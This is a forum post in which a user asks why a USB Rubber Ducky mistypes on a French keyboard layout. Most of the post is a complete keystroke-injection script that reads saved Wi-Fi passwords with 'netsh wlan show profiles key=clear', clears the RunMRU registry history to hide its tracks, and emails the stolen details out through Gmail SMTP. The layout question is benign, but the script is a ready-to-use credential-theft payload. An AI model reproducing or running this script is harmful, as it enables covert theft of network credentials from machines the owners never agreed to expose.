JamesB67000 Posted October 23, 2017 Share Posted October 23, 2017 Hi everybody, I am tring to use some scripts on my Rubber Ducky, but when I try to use it, what is typed by the ducky isn't why I encoded ... I've being tring for many hours, with lots of different scripts Let me show you an example taken from the Duck ToolKit: REM Title: WiFi password grabber REM Author: Siem TTommy REM Version: 4 REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account. DELAY 3000 REM --> Minimize all windows GUI d DELAY 1000 REM --> Open cmd GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 REM --> Getting SSID STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A ENTER REM --> Creating A.txt STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt ENTER REM --> Get network type STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A ENTER REM --> Get authentication STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A ENTER REM --> Get password STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A ENTER REM --> Delete A.txt STRING del A.txt ENTER REM --> Create Log.txt STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER REM --> Mail Log.txt STRING powershell ENTER STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = '' ENTER STRING $ReportEmail.To.Add('') ENTER STRING $ReportEmail.Subject = 'WiFi Password' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER STRING exit ENTER DELAY 1000 REM --> Delete Log.txt and exit STRING del Log.txt & exit ENTER But when I use it on my computer it writes incorrectly: Microsoft Windows [version 10.0.15063] (c) 2017 Microsoft Corporation. Tous droits réservés. C:\Users\Benoit>cd "%USERPiOF " %A in (" ^| findstro/v "OFILES %A% kuthentication" /c:indstr /v "Ra in ('findstr "Nkens=2 delims=:") do set C=%ST La syntaxe du nom de fichier, de répertoire ou de volume est incorrecte. C:\Users\Benoit>fKey Content": %A%>>L & echo Authe %D%>>Log (I did a ctrl+C to catch the wrong typing) As you may have discovered, I'm french, using the french encoding, with a french Keyboard (but with a Belgium beer :) ) . I tried the Duck toolKit online, also, the one from Git. I really don't understand why the Ducky isn't typing correctly FYI I have tested two differents Rubber Ducky, already searched the entire forum. I'm lost ! Does anyone have an idea ? Am I doing something wrong ? thanks for your answers ! Quote Link to comment Share on other sites More sharing options...
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